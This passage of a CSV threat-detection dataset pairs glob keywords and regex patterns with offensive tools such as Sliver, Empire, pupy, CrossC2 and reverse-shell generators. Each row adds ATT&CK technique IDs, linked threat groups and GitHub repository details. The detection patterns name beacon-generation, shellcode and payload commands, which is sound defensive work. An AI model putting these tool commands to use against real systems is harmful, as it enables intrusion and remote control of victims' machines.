T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45543" "*gen -f py_oneliner connect *",".{0,1000}gen\s\-f\spy_oneliner\sconnect\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45544" "*genCrossC2 *",".{0,1000}genCrossC2\s.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45546" "*genCrossC2.*",".{0,1000}genCrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45547" "*genCrossC2.Win.exe*",".{0,1000}genCrossC2\.Win\.exe.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","45548" "*Generador de Payloads FUD by Black$hell256*",".{0,1000}Generador\sde\sPayloads\sFUD\sby\sBlack\$hell256.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - 
TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#content","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","45549" "*Generalrecon -noninteractive*",".{0,1000}Generalrecon\s\-noninteractive.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","45550" "*generate beacon --http *.onion --proxy *",".{0,1000}generate\sbeacon\s\-\-http\s.{0,1000}\.onion\s\-\-proxy\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45551" "*generate beacon --mtls *",".{0,1000}generate\sbeacon\s\-\-mtls\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45552" "*generate exe 
Shadow*",".{0,1000}generate\sexe\sShadow.{0,1000}","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","N/A","10","10","47","7","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z","45553" "*generate --http http*",".{0,1000}generate\s\-\-http\shttp.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45554" "*generate --mtls * --os windows *",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-os\swindows\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45555" "*generate --mtls * --save *",".{0,1000}generate\s\-\-mtls\s.{0,1000}\s\-\-save\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45556" "*generate payload=*",".{0,1000}generate\spayload\=.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","45557" "*generate --tcp-pivot *",".{0,1000}generate\s\-\-tcp\-pivot\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45558" "*generate/canaries.go*",".{0,1000}generate\/canaries\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45559" "*generate/implants.go*",".{0,1000}generate\/implants\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45560" "*generate_beacon*",".{0,1000}generate_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common 
Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z","45561" "*generate_beanshell1*",".{0,1000}generate_beanshell1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45562" "*generate_exploit_path_from_template*",".{0,1000}generate_exploit_path_from_template.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","45563" "*generate_golden_saml*",".{0,1000}generate_golden_saml.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","45564" "*generate_hta 
operation1*",".{0,1000}generate_hta\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45565" "*generate_jdk8u20*",".{0,1000}generate_jdk8u20.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45566" "*generate_loader_cmd*",".{0,1000}generate_loader_cmd.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45567" "*generate_mozillarhino1*",".{0,1000}generate_mozillarhino1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe 
Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45568" "*generate_mozillarhino2*",".{0,1000}generate_mozillarhino2.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45569" "*generate_payload(language, ip, port)*",".{0,1000}generate_payload\(language,\sip,\sport\).{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","45570" "*generate_powershell operation1*",".{0,1000}generate_powershell\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45571" "*generate_powershell_exe*",".{0,1000}generate_powershell_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45572" "*generate_powershell_shellcode(*",".{0,1000}generate_powershell_shellcode\(.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python 
based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","45573" "*generate_powershell_shellcode*",".{0,1000}generate_powershell_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45574" "*generate_python_exe*",".{0,1000}generate_python_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is 
used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45575" "*generate_python_shellcode*",".{0,1000}generate_python_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - 
T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45576" "*generate_raw_payload*",".{0,1000}generate_raw_payload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","45577" "*generate_spoofed_args_exe*",".{0,1000}generate_spoofed_args_exe.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45578" "*generate_stageless*",".{0,1000}generate_stageless.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
